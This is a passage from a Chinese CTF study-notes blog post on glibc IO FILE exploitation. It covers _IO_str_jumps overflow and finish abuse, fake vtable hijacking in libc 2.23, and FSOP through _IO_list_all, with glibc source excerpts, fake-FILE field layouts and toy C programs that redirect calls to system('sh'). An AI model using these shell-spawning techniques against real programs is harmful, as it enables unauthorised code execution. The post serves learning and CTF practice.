__showmanyc = 0x7ffff7a89af0 &lt;_IO_default_showmanyc&gt;, </span><br><span class="line">  __imbue = 0x7ffff7a89b00 &lt;_IO_default_imbue&gt;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="IO-str-jumps-gt-overflow"><a href="#IO-str-jumps-gt-overflow" class="headerlink" title="_IO_str_jumps -&gt; overflow"></a>_IO_str_jumps -&gt; overflow</h2><p>（不是很想贴这些函数的源码，但是不贴的话，后面构造的参数不好理解，所以长篇大论一下吧…）<br>注意这个函数是因为它里面有相对地址调用，而且这个地址不是它内部函数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">int _IO_str_overflow (_IO_FILE *fp, int c)</span><br><span class="line">&#123;</span><br><span class="line">  int flush_only = c == EOF;</span><br><span class="line">  _IO_size_t pos;</span><br><span class="line">  if (fp-&gt;_flags &amp; _IO_NO_WRITES)// pass</span><br><span class="line">      return flush_only ? 0 : EOF;</span><br><span class="line">  if ((fp-&gt;_flags &amp; _IO_TIED_PUT_GET) &amp;&amp; !(fp-&gt;_flags &amp; _IO_CURRENTLY_PUTTING))</span><br><span class="line">    &#123;</span><br><span class="line">      fp-&gt;_flags |= _IO_CURRENTLY_PUTTING;</span><br><span class="line">      fp-&gt;_IO_write_ptr = fp-&gt;_IO_read_ptr;</span><br><span class="line">      fp-&gt;_IO_read_ptr = fp-&gt;_IO_read_end;</span><br><span class="line">    &#125;</span><br><span class="line">  pos = fp-&gt;_IO_write_ptr - fp-&gt;_IO_write_base;</span><br><span class="line">  if (pos &gt;= (_IO_size_t) (_IO_blen (fp) + flush_only))// should in </span><br><span class="line">    &#123;</span><br><span class="line">      if (fp-&gt;_flags &amp; _IO_USER_BUF) /* not allowed to enlarge */ // pass</span><br><span class="line">	return EOF;</span><br><span class="line">      else</span><br><span class="line">	&#123;</span><br><span class="line">	  char *new_buf;</span><br><span class="line">	  char *old_buf = fp-&gt;_IO_buf_base;</span><br><span class="line">	  size_t old_blen = _IO_blen (fp);</span><br><span class="line">	  _IO_size_t new_size = 2 * old_blen + 100;</span><br><span class="line">	  if (new_size &lt; old_blen)//pass 一般会通过</span><br><span class="line">	    return EOF;</span><br><span class="line">	  new_buf</span><br><span class="line">	    = (char *) (*((_IO_strfile *) fp)-&gt;_s._allocate_buffer) (new_size); //target [fp+0xe0] //使用new_buf这句劫持程序流</span><br><span class="line">	  if (new_buf == NULL)</span><br><span class="line">	    &#123;</span><br><span class="line">	      /*	  __ferror(fp) = 1; */</span><br><span class="line">	      return EOF;</span><br><span class="line">	    &#125;</span><br><span class="line">	  if (old_buf)</span><br><span class="line">	    &#123;</span><br><span class="line">	      memcpy (new_buf, old_buf, old_blen);</span><br><span class="line">	      (*((_IO_strfile *) fp)-&gt;_s._free_buffer) (old_buf);</span><br><span class="line">	      /* Make sure _IO_setb won&apos;t try to delete _IO_buf_base. */</span><br><span class="line">	      fp-&gt;_IO_buf_base = NULL;</span><br><span class="line">	    &#125;</span><br><span class="line">	  memset (new_buf + old_blen, &apos;\0&apos;, new_size - old_blen);</span><br><span class="line"></span><br><span class="line">	  _IO_setb (fp, new_buf, new_buf + new_size, 1);</span><br><span class="line">	  fp-&gt;_IO_read_base = new_buf + (fp-&gt;_IO_read_base - old_buf);</span><br><span class="line">	  fp-&gt;_IO_read_ptr = new_buf + (fp-&gt;_IO_read_ptr - old_buf);</span><br><span class="line">	  fp-&gt;_IO_read_end = new_buf + (fp-&gt;_IO_read_end - old_buf);</span><br><span class="line">	  fp-&gt;_IO_write_ptr = new_buf + (fp-&gt;_IO_write_ptr - old_buf);</span><br><span class="line"></span><br><span class="line">	  fp-&gt;_IO_write_base = new_buf;</span><br><span class="line">	  fp-&gt;_IO_write_end = fp-&gt;_IO_buf_end;</span><br><span class="line">	&#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">  if (!flush_only)</span><br><span class="line">    *fp-&gt;_IO_write_ptr++ = (unsigned char) c;</span><br><span class="line">  if (fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_read_end)</span><br><span class="line">    fp-&gt;_IO_read_end = fp-&gt;_IO_write_ptr;</span><br><span class="line">  return c;</span><br><span class="line">&#125;</span><br><span class="line">libc_hidden_def (_IO_str_overflow)</span><br></pre></td></tr></table></figure>

<p>构造：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">_flags = 0</span><br><span class="line">_IO_write_base = 0</span><br><span class="line">_IO_write_ptr = (binsh_in_libc_addr -100) / 2 +1       //很大就行，如0x7fffffffffffffff</span><br><span class="line">_IO_buf_end = (binsh_in_libc_addr -100) / 2 </span><br><span class="line">_IO_buf_base = 0</span><br><span class="line"></span><br><span class="line">_freeres_list = 0x2</span><br><span class="line">_freeres_buf = 0x3</span><br><span class="line">_mode = -1</span><br><span class="line"></span><br><span class="line">vtable = _IO_str_jumps - 0x18</span><br><span class="line">fp+0xe0 = system_addr（addr_of_func/gadget/one_gadget）</span><br><span class="line">fp+0xd8 = addr_of_IO_str_jumps</span><br></pre></td></tr></table></figure>

<h2 id="IO-str-jumps-gt-finish"><a href="#IO-str-jumps-gt-finish" class="headerlink" title="_IO_str_jumps -&gt; finish"></a>_IO_str_jumps -&gt; finish</h2><p>这个似乎更好用哈</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">void _IO_str_finish (_IO_FILE *fp, int dummy)</span><br><span class="line">&#123;</span><br><span class="line">  if (fp-&gt;_IO_buf_base &amp;&amp; !(fp-&gt;_flags &amp; _IO_USER_BUF)) //_IO_buf_base不为空，_flags 与(And) _IO_USER_BUF为假</span><br><span class="line">    (((_IO_strfile *) fp)-&gt;_s._free_buffer) (fp-&gt;_IO_buf_base);// getshell ， [fp+0xe8]</span><br><span class="line">  fp-&gt;_IO_buf_base = NULL;</span><br><span class="line"></span><br><span class="line">  _IO_default_finish (fp, 0);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>构造：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">_flags = (binsh_in_libc + 0x10) &amp; ~1</span><br><span class="line">_IO_buf_base = binsh_addr   //参数地址</span><br><span class="line"></span><br><span class="line">_freeres_list = 0x2</span><br><span class="line">_freeres_buf = 0x3</span><br><span class="line">_mode = -1</span><br><span class="line"></span><br><span class="line">vtable = _IO_str_finish - 0x18</span><br><span class="line"></span><br><span class="line">fp+0xe8 = system_addr（addr_of_func/gadget/one_gadget）</span><br><span class="line">fp+0xd8 = addr_of_IO_str_jumps - 8</span><br></pre></td></tr></table></figure>

<h1 id="libc2-23及之前版本的libc下伪造vtable劫持"><a href="#libc2-23及之前版本的libc下伪造vtable劫持" class="headerlink" title="libc2.23及之前版本的libc下伪造vtable劫持"></a>libc2.23及之前版本的libc下伪造<code>vtable</code>劫持</h1><p><strong>在libc2.23版本下，32位的vtable偏移为<code>0x94</code>，64位的偏移为<code>0xd8</code>。</strong></p>
<h2 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h2><p>经前介绍，我们会发现很多IO操作函数会取出vtable中的指针进行调用。<br>vtable劫持分两种：</p>
<ul>
<li>直接改写vtable中的函数指针，通过任意地址写可以实现。</li>
<li>覆盖vtable的指针指向我们控制的内存，在其中布置函数指针。</li>
</ul>
<p>首先搞清楚欲劫持的IO函数会调用vtable中的哪个函数（上文有介绍）。在xsputn等vtable函数进行调用时，传入的第一个参数其实是对应的_IO_FILE_plus地址。</p>
<h3 id="引例-1"><a href="#引例-1" class="headerlink" title="引例"></a>引例</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    FILE *fp;</span><br><span class="line">    long long *vtable_ptr;</span><br><span class="line">    fp=fopen(&quot;123.txt&quot;,&quot;rw&quot;);</span><br><span class="line">    vtable_ptr=*(long long*)((long long)fp+0xd8);     //get vtable</span><br><span class="line"></span><br><span class="line">    vtable_ptr[7]=0x41414141; //xsputn</span><br><span class="line"></span><br><span class="line">    printf(&quot;call 0x41414141&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>printf会调用vtable的xsputn（下标为7），传递给vtable的第一个参数就是_IO_2_1_stdout</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">#define system_ptr 0x7ffff7a52390;</span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    FILE *fp;</span><br><span class="line">    long long *vtable_ptr;</span><br><span class="line">    fp=fopen(&quot;123.txt&quot;,&quot;rw&quot;);</span><br><span class="line">    vtable_ptr=*(long long*)((long long)fp+0xd8);     //get vtable</span><br><span class="line"></span><br><span class="line">    memcopy(fp,&quot;sh&quot;,3);</span><br><span class="line"></span><br><span class="line">    vtable_ptr[7]=system_ptr //xsputn</span><br><span class="line"></span><br><span class="line">    fwrite(&quot;hi&quot;,2,1,fp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>位于libc数据段的vtable是不可以进行写入的…不过在可控的内存中伪造vtable的方法依然可以实现利用</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">#define system_ptr 0x7ffff7a52390;</span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    FILE *fp;</span><br><span class="line">    long long *vtable_addr,*fake_vtable;</span><br><span class="line"></span><br><span class="line">    fp=fopen(&quot;123.txt&quot;,&quot;rw&quot;);</span><br><span class="line">    fake_vtable=malloc(0x40);       //分配内存存放伪造的vtable</span><br><span class="line"></span><br><span class="line">    vtable_addr=(long long *)((long long)fp+0xd8);     //vtable offset</span><br><span class="line"></span><br><span class="line">    vtable_addr[0]=(long long)fake_vtable;      //修改_IO_FILE_plus的vtable指针指向这块内存</span><br><span class="line"></span><br><span class="line">    memcpy(fp,&quot;sh&quot;,3);</span><br><span class="line"></span><br><span class="line">    fake_vtable[7]=system_ptr; //xsputn</span><br><span class="line"></span><br><span class="line">    fwrite(&quot;hi&quot;,2,1,fp);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>//这给的c不要直接甩上去测试…会报错哒…<br>vtable中放置的是system函数地址，所以需要传递参数”/bin/sh”或”sh”。<br>vtable的函数调用时会把对应的_IO_FILE_plus指针作为第一个参数传递，所以我们把”/sh”写入_IO_FILE_plus头部。之后fwrite的调用就会经过我们伪造的vtable进行执行system(“sh”)。<br>同样，如果程序中不存在 fopen 等函数创建的_IO_FILE 时，也可以选择 stdin\stdout\stderr 等位于libc.so中的_IO_FILE，这些流在 printf\scanf 等函数中就会被使用到。在 libc2.23 之前，这些 vtable 是可以写入并且不存在其他检测的。</p>
<h1 id="FSOP（File-Stream-Oriented-Programming）"><a href="#FSOP（File-Stream-Oriented-Programming）" class="headerlink" title="FSOP（File Stream Oriented Programming）"></a>FSOP（File Stream Oriented Programming）</h1><p>还是在以上FILE结构讲解的基础上进行学习📎</p>
<h2 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h2><p>进程内所有的_IO_FILE结构会使用_chain域互相连接形成一个链表，这个链表的头部由_IO_list_all维护。</p>
<ul>
<li>SOP的核心思想就是劫持_IO_list_all的值来伪造链表和其中的_IO_FILE项。</li>
<li>伪造了之后如何触发？</li>
<li><ul>
<li>调用<code>_IO_flush_all_lockp</code>，这个函数会刷新_IO_list_all链表中的所有项的文件流，相当于对每个FILE调用fflush，也对应着会调用_IO_FILE_plus.vtable中的_IO_overflow。</li>
</ul>
</li>
<li>如何调用<code>_IO_flush_all_lockp</code>？</li>
<li><ul>
<li>不需要攻击者手动调用，在一些情况下这个函数会被系统调用：</li>
</ul>
</li>
<li><ul>
<li>1.当libc执行<strong>abort</strong>流程时</li>
</ul>
</li>
<li><ul>
<li>2.执行<strong>exit</strong>函数时</li>
</ul>
</li>
<li><ul>
<li>3.当执行流<strong>从main函数返回</strong>时</li>
</ul>
</li>
</ul>
<h2 id="利用条件"><a href="#利用条件" class="headerlink" title="利用条件"></a>利用条件</h2><p>1.得到libc基址（因为_IO_list_all是作为全局变量储存在libc.so中的，不泄露libc基址就不能改写_IO_list_all）<br>2.用任意地址写把_IO_list_all的内容改为指向我们可控内存的指针<br>3.在可控内存中布置一个我们理想函数的vtable指针。怎么才能达到理想咧？</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">int</span><br><span class="line">_IO_flush_all_lockp (int do_lock)</span><br><span class="line">&#123;</span><br><span class="line">  int result = 0;</span><br><span class="line">  struct _IO_FILE *fp;</span><br><span class="line">  int last_stamp;</span><br><span class="line"></span><br><span class="line">  fp = (_IO_FILE *) _IO_list_all;</span><br><span class="line">  while (fp != NULL)</span><br><span class="line">    &#123;</span><br><span class="line">        ...</span><br><span class="line">      if (((fp-&gt;_mode &lt;= 0 &amp;&amp; fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base)</span><br><span class="line">#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T</span><br><span class="line">       || (_IO_vtable_offset (fp) == 0</span><br><span class="line">           &amp;&amp; fp-&gt;_mode &gt; 0 &amp;&amp; (fp-&gt;_wide_data-&gt;_IO_write_ptr</span><br><span class="line">                    &gt; fp-&gt;_wide_data-&gt;_IO_write_base))</span><br><span class="line">#endif</span><br><span class="line">       )</span><br><span class="line">      &amp;&amp; _IO_OVERFLOW (fp, EOF) == EOF)   //，如果输出缓冲区有数据，刷新输出缓冲区</span><br><span class="line">    result = EOF;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    fp = fp-&gt;_chain; //遍历链表</span><br><span class="line">    &#125;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>所以要想调用后面的<code>_IO_OVERFLOW(fp, EOF)</code>，条件就是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1.fp-&gt;_mode &lt;= 0</span><br><span class="line">2.fp-&gt;_IO_write_ptr &gt; fp-&gt;_IO_write_base</span><br><span class="line">或</span><br><span class="line">1._IO_vtable_offset (fp) == 0</span><br><span class="line">2.fp-&gt;_mode &gt; 0</span><br><span class="line">3.fp-&gt;_wide_data-&gt;_IO_write_ptr &gt; fp-&gt;_wide_data-&gt;_IO_write_base</span><br></pre></td></tr></table></figure>

<hr>
<blockquote>
<p>以上参考<br><a href="https://ctf-wiki.github.io/ctf-wiki" target="_blank" rel="noopener">CTF-wiki</a><br><a href="https://veritas501.space/2017/12/13/IO%20FILE%20%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" target="_blank" rel="noopener">veritas501 IO FILE学习笔记</a><br><a href="https://xiaoxiaorenwu.top/2019/07/05/5%E7%A7%8D%E6%96%B9%E6%B3%95%E8%A7%A3heap_master/" target="_blank" rel="noopener">xiaoxiaorenwu 5种方法解heap_master</a></p>
</blockquote>
  
	  </div>
		  <footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/笔记/">笔记</a>
</div>


  <div class="article-tags">
  
  <span></span> <a href="/tags/pwn/">pwn</a><a href="/tags/笔记/">笔记</a><a href="/tags/IO/">IO</a>
  </div>

</div>



</footer>

   	       
	  </article>
	  
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2019/10/23/unsorted bin attack/unsorted bin attack/" title="Unsorted Bin Attack">
  <span>
  Unsorted Bin Attack</span>
</a>
</div>


<div class="next">
<a href="/2019/10/07/ubuntu18/ubuntu18/"  title="ubuntu18安装各种pwn工具">
 <span>ubuntu18安装各种pwn工具
</span>
</a>
</div>

</nav>

	  

</div> 
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">
<div id="authorInfo">
	
		<div class="author-img"></div>		
	
	<div class="social-info" class="clearfix">
		
		<a href="http://weibo.com/https://weibo.com/u/5213203661?refer_flag=0000015010_&amp;from=feed&amp;loc=nickname" target="_blank" class="icon-weibo" title="微博"></a>
		
		
		<a href="https://github.com/p1Kk" target="_blank" class="icon-github" title="github"></a>
		
		
		
		
		
		
		
		
		
		
		<a href="mailto:p1kk_wang@qq.com" target="_blank" class="icon-email" title="Email Me"></a>
		

	</div>
</div>

  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
		  
			<li><a href="/categories/ACM/" title="ACM">ACM<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/CTF/" title="CTF">CTF<sup>4</sup></a></li>
		  
		
		  
			<li><a href="/categories/oj/" title="oj">oj<sup>5</sup></a></li>
		  
		
		  
			<li><a href="/categories/笔记/" title="笔记">笔记<sup>11</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">Tags</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/pwn/" title="pwn">pwn<sup>17</sup></a></li>
			
		
			
				<li><a href="/tags/wp/" title="wp">wp<sup>9</sup></a></li>
			
		
			
				<li><a href="/tags/笔记/" title="笔记">笔记<sup>7</sup></a></li>
			
		
			
				<li><a href="/tags/堆/" title="堆">堆<sup>6</sup></a></li>
			
		
			
				<li><a href="/tags/攻防世界/" title="攻防世界">攻防世界<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/ubuntu18/" title="ubuntu18">ubuntu18<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/AWD/" title="AWD">AWD<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/canary/" title="canary">canary<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/java/" title="java">java<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/HDU/" title="HDU">HDU<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/IO/" title="IO">IO<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/C/" title="C++">C++<sup>1</sup></a></li>
			
		
		</ul>
</div>


  <div class="linkslist">
  <p class="asidetitle">Links</p>
    <ul>
        
          <li>
            
            	<a href="https://whali3n51.github.io" target="_blank" title="whali3n51">whali3n51</a>
            
          </li>
        
    </ul>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	

	<p class="copyright">
	Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/hsihohuang/kiddochan" target="_blank" title="Kiddochan">Kiddochan</a> © 2020 
	
	<a href="/about" target="_blank" title="p1Kk">p1Kk</a>
	
	
	</p>
</div></footer>
    <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/jquery.qrcode-0.12.0.min.js"></script>

<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
  
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else{
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
        
    }
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  c.click(function(){
    ta.css('display', 'block').addClass('fadeIn');
  });
  o.click(function(){
    ta.css('display', 'none');
  });
  $(window).scroll(function(){
    ta.css("top",Math.max(140,320-$(this).scrollTop()));
  });
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina'),
      description = $this.attr('description');
  var html = [
  '<div class="hoverqrcode clearfix"></div>',
  '<a class="overlay" id="qrcode"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="微信"></a>',
  '<a href="http://widget.renren.com/dialog/share?resourceUrl=' + encodedUrl + '&srcUrl=' + encodedUrl + '&title=' + title +'" class="article-share-renren" target="_blank" title="人人"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="微博"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);

  $('.hoverqrcode').hide();

  var myWidth = 0;
  function updatehoverqrcode(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
    var qrsize = myWidth > 1024 ? 200:100;
    var options = {render: 'image', size: qrsize, fill: '#2ca6cb', text: url, radius: 0.5, quiet: 1};
    var p = $('.article-share-qrcode').position();
    $('.hoverqrcode').empty().css('width', qrsize).css('height', qrsize)
                          .css('left', p.left-qrsize/2+20).css('top', p.top-qrsize-10)
                          .qrcode(options);
  };
  $(window).resize(function(){
    $('.hoverqrcode').hide();
  });
  $('.article-share-qrcode').click(function(){
    updatehoverqrcode();
    $('.hoverqrcode').toggle();
  });
  $('.article-share-qrcode').hover(function(){}, function(){
      $('.hoverqrcode').hide();
  });
});   
</script>









<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.article-content').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox')) return;
      var alt = this.alt;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'article' + i);
    });
  });
  if($.fancybox){
    $('.fancybox').fancybox();
  }
}); 
</script>



<!-- Analytics Begin -->





<!-- Analytics End -->

<!-- Totop Begin -->

	<div id="totop">
	<a title="Back to Top"><img src="/img/scrollup.png"/></a>
	</div>
	<script src="/js/totop.js"></script>

<!-- Totop End -->

<!-- MathJax Begin -->
<!-- mathjax config similar to math.stackexchange -->


<!-- MathJax End -->

<!-- Tiny_search Begin -->

<!-- Tiny_search End -->

  </body>
</html>
